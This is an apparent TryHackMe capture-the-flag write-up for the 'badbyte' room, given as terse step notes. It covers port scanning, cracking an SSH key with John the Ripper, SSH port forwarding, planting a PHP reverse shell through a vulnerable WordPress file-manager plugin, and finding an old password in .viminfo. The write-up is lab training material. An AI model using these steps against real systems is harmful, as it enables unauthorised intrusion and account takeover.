TryHackMe | badbyte by electronforce

Task 1 | Deploy the machine

Task 2 | Reconnaissance

Q1: How many ports are open?

rustscan
 nmap -p- -vv 10.10.206.236 -oA 10.10.206.236

Task 3 | Foothold

ftp to host
python /opt/john/ssh2john.py id_rsa > id_rsa.hashjohn id_rsa.hash -w=$(locate rockyou.txt)
note.txt
john the ripper
root:~# chmod 600 id_rsa
Note.txt

Task 4 | Port Forwarding

Q7: What main TCP ports are listening on localhost?

ssh -ND 9050 -i id_rsa  username@$ip
ssh dynamic port forward

Task 5 | Web Exploitation

Q9: What CMS is running on the machine?

ssh local port forward
nmap http-wordpress-enum
cp /usr/share/webshells/php/php-reverse-shell.php /tmp/s.php
download exploit
manually used script by
Catching the shell
curl http://127.0.0.1:8080/wp-content/plugins/wp-file-manager/lib/php/../files/s.php
boom user.txt

Task 6 | Privilege Escalation

Q16:What is the user’s old password?

.viminfo in home directory
.viminfo contents
w00t root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store